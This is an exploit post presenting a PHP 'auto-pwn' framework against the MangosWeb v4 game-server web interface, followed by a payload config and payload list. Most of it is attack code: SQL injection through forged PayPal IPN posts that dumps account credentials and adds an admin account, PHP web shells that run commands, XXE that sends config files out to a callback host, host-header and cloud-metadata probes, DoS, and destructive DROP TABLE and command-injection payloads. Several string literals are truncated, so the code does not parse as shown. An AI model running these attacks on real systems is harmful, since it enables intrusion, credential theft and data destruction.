=============================================================================================================================================
| # Title MaNGOSWeb 4.0.6 Multi-Exploit Framework
=============================================================================================================================================
| # Title : MaNGOSWeb V4 4.0.6 MangosWeb v4 Multi-Exploit Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/ipn.php |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212429/ & CVE-2017-6478
[+] Summary : A comprehensive penetration testing tool designed to identify and exploit multiple critical vulnerabilities in MangosWeb v4, a World of Warcraft emulator web interface.
[+] Core Components :
Multi-Vector Attack Framework
SQL Injection exploitation via PayPal IPN
XXE (XML External Entity) attacks via RSS feed
File Write vulnerabilities leading to RCE
Host Header Injection for SSRF/phishing
CSRF (Cross-Site Request Forgery) attacks
DoS (Denial of Service) testing
[+] POC :
<?php
/*
===================================================
Author: indoushka
Target: MangosWeb v4 (PayPal IPN & RSS)
Usage: php exploit.php http://target.com
===================================================
*/
/**
 * Proof-of-concept driver for the MangosWeb v4 issues listed in the header above.
 *
 * All HTTP traffic goes through one shared cURL handle ($this->session). cURL
 * options persist on a handle, so values set by one step (CURLOPT_POST,
 * CURLOPT_POSTFIELDS, CURLOPT_HTTPHEADER) stay in force for later steps unless a
 * later curl_setopt* call overrides them; several steps below depend on that
 * without saying so.
 *
 * Artefacts are written to the current working directory: sqli_result_<type>.txt,
 * stolen_accounts.txt, xxe.dtd and exploitation_report.txt.
 *
 * NOTE(review): the 'payer_email' entries in this listing are truncated string
 * literals that run onto the following line, so the array literals containing
 * them do not parse as shown; the listing is not runnable in this form.
 *
 * Defensive reading: the page's premise is that paypal_ipn.php accepts
 * unverified IPN POSTs and interpolates their fields into SQL. Verifying each
 * notification with PayPal's IPN verification callback (rather than a
 * source-IP check) and using parameterised queries removes that entry point,
 * which steps 2-4 and 6-9 all rely on.
 */
class MangosWebExploit {
private $target; // target base URL, trailing '/' removed
private $base_url; // copy of $target; not read anywhere else in this class
private $results = []; // 'endpoints' => [path => true], filled by discover_paths()
private $session; // shared cURL handle, created here and closed in __destruct()
/**
 * @param string $url target base URL (scheme and host); a trailing '/' is stripped
 */
public function __construct($url) {
$this->target = rtrim($url, '/');
$this->base_url = $this->target;
$this->session = curl_init();
// Shared cURL handle: follow redirects, 15 s timeout, browser-like UA.
// Peer and hostname TLS verification are both disabled, so the tool's own
// traffic (and whatever it later writes to disk) is exposed to interception.
curl_setopt_array($this->session, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 15,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
echo "===========================================\n";
echo "MangosWeb v4 Exploitation Framework Started\n";
echo "Target: {$this->target}\n";
echo "===========================================\n\n";
}
/**
 * 1. Endpoint discovery: GET each candidate path and record those that answer 200.
 *
 * Only the status code is inspected, so a site that answers 200 for unknown
 * paths marks every candidate as found.
 *
 * @return array<string,bool>|null found paths; when nothing answered 200 the
 *         'endpoints' key was never set and the return reads an undefined index
 */
public function discover_paths() {
echo "[*] Scanning for vulnerable endpoints...\n";
$endpoints = [
'/paypal_ipn.php',
'/rss.php',
'/index.php',
'/admin/',
'/core/cache/rss/news.xml',
'/config/config-protected.php',
'/install/',
'/donate.php'
];
foreach ($endpoints as $endpoint) {
$url = $this->target . $endpoint;
curl_setopt($this->session, CURLOPT_URL, $url);
$response = curl_exec($this->session);
$http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
if ($http_code == 200) {
echo "[+] Found: {$endpoint}\n";
$this->results['endpoints'][$endpoint] = true;
}
}
return $this->results['endpoints'];
}
/**
 * 2. UNION-based SQL injection through the txn_id field of paypal_ipn.php.
 *
 * The spoofed X-Forwarded-For is meant to pass a "request comes from PayPal"
 * source-IP check; an IPN handler that takes the client address from that
 * header can be satisfied by any caller, which is why verification through
 * PayPal's IPN callback is the control that actually works.
 *
 * "Success" is nothing more than a body longer than 100 bytes, so any verbose
 * error page qualifies; the raw body is saved to sqli_result_<type>.txt.
 * The CURLOPT_HTTPHEADER set here stays on the shared handle afterwards.
 */
public function exploit_paypal_sqli() {
echo "\n[*] Exploiting PayPal IPN SQL Injection...\n";
$payloads = [
// DB fingerprint: server version, current user, database name
"1' UNION SELECT 1,2,3,4,5,6,7,8,@@version,10,user(),database() -- -" => "db_info",
// table names in the current schema
"1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name),10,11 FROM information_schema.tables WHERE table_schema=database() -- -" => "tables",
// column names of mw_accounts
"1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name),10,11 FROM information_schema.columns WHERE table_name='mw_accounts' -- -" => "mw_accounts_columns",
// first ten account rows
"1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,':',password,':',email),10,11 FROM mw_accounts LIMIT 0,10 -- -" => "accounts"
];
$ipn_url = $this->target . '/paypal_ipn.php';
foreach ($payloads as $payload => $type) {
$post_data = [
'txn_id' => $payload,
'item_name' => 'VIP Package --- Account: admin(#1)',
'item_number' => '1',
'payer_email' => '
'payment_type' => 'instant',
'payment_status' => 'Completed',
'mc_gross' => '100.00',
'custom' => 'exploit'
];
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data),
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'X-Forwarded-For: 173.0.82.126' // presented as a PayPal address; a handler trusting this header is the weakness
]
]);
$response = curl_exec($this->session);
if (strlen($response) > 100) {
echo "[+] SQL Injection successful for: {$type}\n";
// keep the raw body in the CWD
$filename = "sqli_result_{$type}.txt";
file_put_contents($filename, $response);
echo " [*] Saved to: {$filename}\n";
// count recognisable artefacts in the body
$this->parse_sqli_results($response, $type);
}
}
}
/**
 * 3. XXE through the RSS feed: a stacked UPDATE carried in item_number plants an
 * XML document that references an external DTD, then rss.php is requested so
 * the planted document is parsed.
 *
 * Both callback URLs are built from $_SERVER['HTTP_HOST'], i.e. the host this
 * tool was requested on (only populated when it runs under a web server). The
 * target is expected to fetch /xxe.dtd and then /exfil?data=<base64> from that
 * host; those two outbound requests from the web server are the detection
 * signal, and egress filtering plus an XML parser with external-entity loading
 * disabled stop the technique. 'PD9waHA' is the base64 prefix of "<?php".
 */
public function exploit_rss_xxe() {
echo "\n[*] Exploiting RSS XXE Vulnerability...\n";
// external DTD, to be served from this host
$dtd_content = '<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=config/config-protected.php">
<!ENTITY % param "<!ENTITY % exfil SYSTEM \'http://' . $_SERVER['HTTP_HOST'] . '/exfil?data=%file;\'>">
%param;';
// written to the CWD so the built-in server started below can serve it
file_put_contents('xxe.dtd', $dtd_content);
// XXE Payload
$xxe_payload = '<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % remote SYSTEM "http://' . $_SERVER['HTTP_HOST'] . '/xxe.dtd">
%remote;
%exfil;
]>
<test>XXE Test</test>';
// plant the document in mw_news via a stacked UPDATE (assumes stacked statements execute)
$payload = "1'); UPDATE mw_news SET message='" . addslashes($xxe_payload) . "' WHERE id=1; -- ";
$post_data = [
'txn_id' => 'xxe_inject',
'item_name' => 'XXE Test --- Account: admin(#1)',
'item_number' => $payload,
'payer_email' => '
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
// bring up the local listener (see start_exfiltration_server)
$this->start_exfiltration_server();
// request the feed so the planted document gets parsed
$rss_url = $this->target . '/rss.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $rss_url,
CURLOPT_POST => false
]);
$rss_response = curl_exec($this->session);
if (strpos($rss_response, 'PD9waHA') !== false) {
echo "[+] XXE Successful! Config file exfiltrated.\n";
}
}
/**
 * 4. Tries to write a PHP file with SELECT ... INTO OUTFILE, then probes the
 * candidate locations and treats 'uid=' or 'www-data' in the response as
 * proof of execution.
 *
 * INTO OUTFILE needs the FILE privilege on the database account and a
 * directory the MySQL process can write to that the web server also serves;
 * running the application's DB user without FILE and setting secure_file_priv
 * closes that path. Requests for /shell.php?cmd= are an unambiguous
 * detection signal.
 *
 * @return bool true once a probe URL returned shell-like output, false otherwise
 */
public function exploit_file_write_rce() {
echo "\n[*] Attempting RCE via File Write...\n";
$php_shell = base64_encode('<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>'); // computed but never used below
$payloads = [
// write a file via SELECT ... INTO OUTFILE
"1' UNION SELECT 1,2,3,4,5,6,7,8,'<?php system(\$_GET[cmd]); ?>',10,11 INTO OUTFILE '/var/www/html/shell.php' -- -",
// same, aimed at the RSS cache directory
"1' UNION SELECT 1,2,3,4,5,6,7,8,'<?php eval(\$_POST[a]); ?>',10,11 INTO OUTFILE '" . $this->target . "/core/cache/rss/shell.php' -- -"
];
foreach ($payloads as $index => $payload) {
$post_data = [
'txn_id' => $payload,
'item_name' => 'RCE Shell --- Account: admin(#1)',
'payer_email' => '
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
echo "[.] Attempted RCE payload {$index}\n";
// probe the candidate locations
$shell_urls = [
$this->target . '/shell.php?cmd=id',
$this->target . '/core/cache/rss/shell.php',
$this->target . '/core/cache/rss/news.xml'
];
foreach ($shell_urls as $shell_url) {
curl_setopt_array($this->session, [
CURLOPT_URL => $shell_url,
CURLOPT_POST => false
]);
$shell_test = curl_exec($this->session);
if (strpos($shell_test, 'uid=') !== false ||
strpos($shell_test, 'www-data') !== false) {
echo "[+] RCE SUCCESSFUL! Shell at: {$shell_url}\n";
// run a few commands through the dropped file
$commands = [
'whoami',
'pwd',
'ls -la',
'cat /etc/passwd'
];
foreach ($commands as $cmd) {
// relies on strpos() being truthy (non-zero offset) to pick the separator
$cmd_url = $shell_url . (strpos($shell_url, '?') ? '&' : '?') . 'cmd=' . urlencode($cmd);
curl_setopt($this->session, CURLOPT_URL, $cmd_url);
$result = curl_exec($this->session);
echo "\n[Command]: {$cmd}\n";
echo "[Result]: " . substr($result, 0, 500) . "\n";
}
return true;
}
}
}
return false;
}
/**
 * 5. Sends rss.php requests with overridden Host / X-Forwarded-Host headers and
 * reports success if 'evil.com' or '127.0.0.1' appears in the response.
 *
 * Only two of the five injected values are looked for, so reflection of the
 * other three goes unreported, and the inner 169.254.169.254 branch can only
 * run when a response to that request happens to contain one of the two
 * checked strings. An application that builds absolute URLs from a configured
 * canonical host instead of the request's Host header does not reflect these.
 */
public function exploit_host_injection() {
echo "\n[*] Exploiting Host Header Injection...\n";
$malicious_headers = [
'Host: evil.com',
'Host: 127.0.0.1:3306',
'Host: 169.254.169.254/latest/meta-data/', // AWS Metadata
'Host: localhost:22',
'X-Forwarded-Host: internal.admin.panel'
];
$rss_url = $this->target . '/rss.php';
foreach ($malicious_headers as $header) {
curl_setopt_array($this->session, [
CURLOPT_URL => $rss_url,
CURLOPT_POST => false,
CURLOPT_HTTPHEADER => [$header]
]);
$response = curl_exec($this->session);
if (strpos($response, 'evil.com') !== false ||
strpos($response, '127.0.0.1') !== false) {
echo "[+] Host Injection successful with: {$header}\n";
// SSRF hint; only reachable inside the outer match, which never tests for this value
if (strpos($header, '169.254.169.254') !== false) {
echo "[!] Possible AWS Metadata exposure!\n";
}
}
}
}
/**
 * 6. Sends three forged "Completed" notifications for the given account id
 * with a paypal.com Referer. Despite the name there is no browser victim;
 * this is forged-notification abuse, and IPN verification with PayPal is the
 * control that stops it. The response is never inspected.
 *
 * @param int $victim_account_id account id embedded in item_name (default 1)
 */
public function exploit_csrf($victim_account_id = 1) {
echo "\n[*] Launching CSRF Attack...\n";
for ($i = 0; $i < 3; $i++) {
$txn_id = 'CSRF' . time() . rand(1000,9999);
$post_data = [
'txn_id' => $txn_id,
'item_name' => "Free Premium --- Account: victim(#{$victim_account_id})",
'item_number' => '999',
'payer_email' => '
'payment_type' => 'instant',
'payment_status' => 'Completed',
'mc_gross' => rand(50, 500) . '.00',
'mc_currency' => 'USD',
'payment_date' => date('H:i:s M d, Y T')
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data),
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'Referer: https://www.paypal.com/'
]
]);
$response = curl_exec($this->session);
echo "[+] Sent fake transaction: {$txn_id}\n";
}
}
/**
 * 7. Builds a roughly 5 MB RSS document (5000 items of 1000 'A's), tries to
 * push it into the feed cache through item_number, then times ten rss.php
 * requests and declares the server vulnerable if they take more than 5 s.
 *
 * The "1')); ?>" prefix suggests the cache is generated as a PHP file from
 * unsanitised input (not visible here). Note that CURLOPT_POST and the 5 MB
 * CURLOPT_POSTFIELDS set before the timing loop are still on the shared
 * handle, so the ten "fetches" re-send that body as POSTs; the measurement
 * mostly reflects upload time and is not a meaningful DoS indicator.
 */
public function exploit_dos() {
echo "\n[*] Testing DoS vulnerability...\n";
// oversized feed body: 5000 items x 1000 'A's
$large_xml = '<?xml version="1.0"?><rss><channel>';
for ($i = 0; $i < 5000; $i++) {
$large_xml .= '<item><title>' . str_repeat('A', 1000) . '</title></item>';
}
$large_xml .= '</channel></rss>';
// push it into the cache via item_number
$cache_payload = "1')); ?>" . $large_xml . "<?php //";
$post_data = [
'txn_id' => 'dos_attack',
'item_name' => 'DoS Test --- Account: admin(#1)',
'item_number' => $cache_payload,
'payer_email' => '
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
curl_exec($this->session);
// time ten requests to the feed (POST options from above still apply)
$rss_url = $this->target . '/rss.php';
$start_time = microtime(true);
for ($i = 0; $i < 10; $i++) {
curl_setopt($this->session, CURLOPT_URL, $rss_url);
curl_exec($this->session);
echo ".";
}
$total_time = microtime(true) - $start_time;
echo "\n[+] DoS test completed in {$total_time} seconds\n";
if ($total_time > 5) {
echo "[!] Server is vulnerable to DoS attacks\n";
}
}
/**
 * 8. Stacked INSERT of a gmlevel-3 account with an MD5 password hash (the
 * scheme this payload assumes mw_accounts uses). The success lines are
 * printed unconditionally; the response is never inspected.
 */
public function add_admin_user() {
echo "\n[*] Adding admin user to database...\n";
$username = 'hacker_' . rand(1000,9999);
$password = md5('Password123!');
$email = 'hacker' . rand(100,999) . '@evil.com';
$payload = "1'); INSERT INTO mw_accounts (username, password, email, gmlevel, joindate) VALUES ('{$username}', '{$password}', '{$email}', '3', NOW()); -- ";
$post_data = [
'txn_id' => 'add_admin',
'item_name' => 'Add User --- Account: admin(#1)',
'item_number' => $payload,
'payer_email' => '
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
echo "[+] Admin user added:\n";
echo " Username: {$username}\n";
echo " Password: Password123!\n";
echo " Email: {$email}\n";
echo " GM Level: 3 (Administrator)\n";
}
/**
 * 9. UNION dump of mw_accounts (username:password:email:gmlevel), parsed with
 * a regex and written in clear text to stolen_accounts.txt in the CWD — a
 * directory that start_exfiltration_server() later publishes on port 8888.
 */
public function steal_accounts() {
echo "\n[*] Stealing user accounts...\n";
$payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT('ACCOUNT:',username,':',password,':',email,':',gmlevel),10,11 FROM mw_accounts -- -";
$post_data = [
'txn_id' => $payload,
'item_name' => 'Steal Accounts --- Account: admin(#1)',
'payer_email' => '
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
if (preg_match_all('/ACCOUNT:([^:]+):([^:]+):([^:]+):([^:]+)/', $response, $matches)) {
echo "[+] Stolen Accounts:\n";
$accounts_file = 'stolen_accounts.txt';
$file_content = "Stolen Accounts from {$this->target}\n";
$file_content .= "====================================\n\n";
for ($i = 0; $i < count($matches[0]); $i++) {
$username = $matches[1][$i];
$password = $matches[2][$i];
$email = $matches[3][$i];
$gmlevel = $matches[4][$i];
echo " {$username} : {$password} : {$email} (GM: {$gmlevel})\n";
$file_content .= "Username: {$username}\n";
$file_content .= "Password: {$password}\n";
$file_content .= "Email: {$email}\n";
$file_content .= "GM Level: {$gmlevel}\n";
$file_content .= "---\n";
}
file_put_contents($accounts_file, $file_content);
echo "\n[+] Accounts saved to: {$accounts_file}\n";
}
}
/**
 * 10. Runs every step in order with a 2 s pause between them, then writes the report.
 *
 * catch (Exception $e) does not catch \Error (TypeError etc.), so an engine
 * error in one step aborts the whole sequence. The bool returned by
 * exploit_file_write_rce() is discarded, and the closing "COMPLETED
 * SUCCESSFULLY" banner prints regardless of what the steps observed.
 */
public function auto_pwn() {
echo "\n[*] Starting AUTO-PWN sequence...\n";
$steps = [
'discover_paths',
'exploit_paypal_sqli',
'steal_accounts',
'add_admin_user',
'exploit_rss_xxe',
'exploit_host_injection',
'exploit_file_write_rce',
'exploit_csrf',
'exploit_dos'
];
foreach ($steps as $step) {
echo "\n[=== Step: {$step} ===]\n";
try {
$this->$step();
sleep(2); // pause between steps
} catch (Exception $e) {
echo "[!] Error in {$step}: " . $e->getMessage() . "\n";
}
}
echo "\n========================================\n";
echo "[?] AUTO-PWN COMPLETED SUCCESSFULLY!\n";
echo "========================================\n";
// write the summary file
$this->generate_report();
}
// --- helpers ---
/**
 * Counts regex matches for version-like strings, mw_* table names and
 * user:md5:email triples in a SQLi response body.
 *
 * @param string $response raw HTTP body
 * @param string $type unused; not referenced in the body
 */
private function parse_sqli_results($response, $type) {
$patterns = [
'mysql' => '/[0-9]+\.[0-9]+\.[0-9]+/',
'tables' => '/(mw_[a-z_]+)/',
'accounts' => '/([a-zA-Z0-9_]+):([a-f0-9]{32}):([^:]+)/'
];
foreach ($patterns as $pattern_type => $pattern) {
if (preg_match_all($pattern, $response, $matches)) {
echo " [*] Found {$pattern_type}: " . count($matches[0]) . " items\n";
}
}
}
/**
 * Backgrounds `php -S 0.0.0.0:8888 -t .` to receive the XXE callbacks.
 *
 * `-t .` serves the tool's whole working directory — this source file,
 * xxe.dtd, sqli_result_*.txt and stolen_accounts.txt — to anyone who can
 * reach port 8888 on every interface. The built-in server's request log,
 * the only place the /exfil?data= hit would show up, is sent to /dev/null,
 * so the exfiltrated value is not actually captured by this tool.
 */
private function start_exfiltration_server() {
// minimal listener for the DTD fetch and the exfil callback
$port = 8888;
echo "[*] Starting exfiltration server on port {$port}...\n";
// backgrounded with '&' rather than run in-process; no router script, so
// presumably only files present in the CWD are answered
$cmd = "php -S 0.0.0.0:{$port} -t . > /dev/null 2>&1 &";
exec($cmd);
}
/**
 * Writes exploitation_report.txt. The vulnerability list is hard-coded and
 * independent of what the steps actually observed; only the "Files Created"
 * section reflects the run (every *.txt in the CWD, including unrelated files).
 */
private function generate_report() {
$report = "MangosWeb v4 Exploitation Report\n";
$report .= "Generated: " . date('Y-m-d H:i:s') . "\n";
$report .= "Target: {$this->target}\n";
$report .= "=====================================\n\n";
$report .= "Vulnerabilities Found:\n";
$report .= "1. SQL Injection (Critical)\n";
$report .= "2. XXE Injection (Critical)\n";
$report .= "3. RCE via File Write (Critical)\n";
$report .= "4. Host Header Injection (High)\n";
$report .= "5. CSRF (Medium)\n";
$report .= "6. DoS (Medium)\n\n";
$report .= "Files Created:\n";
$files = glob('*.txt');
foreach ($files as $file) {
$report .= "- {$file}\n";
}
file_put_contents('exploitation_report.txt', $report);
echo "[+] Report saved to: exploitation_report.txt\n";
}
// Releases the shared cURL handle.
public function __destruct() {
curl_close($this->session);
}
}
// Entry point: command-line mode or, when served by a web server, a form-driven web mode
// Runs the requested mode on an already-constructed tool instance. Mode values are
// compared as plain strings; an unrecognised or missing mode runs the full sequence.
$run = function ($tool, $selected) {
    if ($selected === 'sql') {
        $tool->exploit_paypal_sqli();
        $tool->steal_accounts();
    } elseif ($selected === 'rce') {
        $tool->exploit_file_write_rce();
    } elseif ($selected === 'csrf') {
        $tool->exploit_csrf();
    } elseif ($selected === 'dos') {
        $tool->exploit_dos();
    } else {
        $tool->auto_pwn();
    }
};
if (php_sapi_name() === 'cli') {
    // Command-line mode: php exploit.php <target> [mode]; 'dos' is accepted but not listed.
    if ($argc < 2) {
        echo "Usage: php exploit.php http://target.com [mode]\n";
        echo "Modes:\n";
        echo " auto - Full auto exploitation (default)\n";
        echo " sql - SQL Injection only\n";
        echo " rce - RCE attempts only\n";
        echo " csrf - CSRF attacks only\n";
        exit(1);
    }
    $run(new MangosWebExploit($argv[1]), $argv[2] ?? 'auto');
} else {
    // Web mode: the form is printed on every request; a POST carrying 'target' runs
    // the selected mode with all tool output buffered and HTML-escaped.
    // Nothing authenticates the caller here: wherever this file is reachable, any
    // client can make this host send the traffic above to an arbitrary URL.
    echo '<!DOCTYPE html>
<html>
<head>
<title>MangosWeb v4 Exploit</title>
<style>
body { font-family: Arial; margin: 20px; }
.container { max-width: 800px; margin: auto; }
input, select { padding: 8px; margin: 5px; }
button { background: #d00; color: white; padding: 10px 20px; border: none; cursor: pointer; }
.result { background: #f5f5f5; padding: 15px; margin: 10px 0; }
</style>
</head>
<body>
<div class="container">
<h2>MangosWeb v4 Exploitation Tool</h2>
<form method="POST">
<input type="url" name="target" placeholder="http://target.com" size="50" required>
<select name="mode">
<option value="auto">Auto Pwn</option>
<option value="sql">SQL Injection</option>
<option value="rce">Remote Code Execution</option>
<option value="csrf">CSRF Attack</option>
<option value="dos">DoS Test</option>
</select>
<button type="submit">Launch Attack</button>
</form>';
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['target'])) {
        echo '<div class="result"><pre>';
        // Capture everything the tool echoes so it can be escaped before it reaches the page.
        ob_start();
        $run(new MangosWebExploit($_POST['target']), $_POST['mode']);
        echo htmlspecialchars(ob_get_clean());
        echo '</pre></div>';
    }
    echo '</div></body></html>';
}
?>
************** # server_config.py**************
# server_config.py
# Standalone configuration for a separate Python runner; nothing in the PHP listing
# above reads it. 'threads', 'payloads_file' and 'output_dir' are declared here only.
# The third SQL entry is destructive (drops the accounts table), not a probe.
EXPLOIT_CONFIG = dict(
    target='http://victim.com',
    timeout=30,
    threads=5,
    payloads_file='payloads.txt',
    output_dir='results',
    sql_payloads=[
        "' UNION SELECT @@version --",
        "' AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd') --",
        "'); DROP TABLE mw_accounts; --",
    ],
    xxe_payloads=[
        '<?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>',
        '<?xml version="1.0"?><!DOCTYPE test [<!ENTITY % remote SYSTEM "http://ATTACKER/xxe.dtd">%remote;]>',
    ],
)
**************************************
payloads.txt
-- SQL Injection Payloads
' OR '1'='1
' UNION SELECT NULL,NULL,NULL,NULL
'); INSERT INTO mw_accounts VALUES ('hacker',MD5('pass'),'
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --
-- File Path Traversal
../../../../etc/passwd
../config.php
/var/www/html/config.php
C:\Windows\System32\drivers\etc\hosts
-- Command Injection
;id;
| whoami
`cat /etc/passwd`
$(uname -a)
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================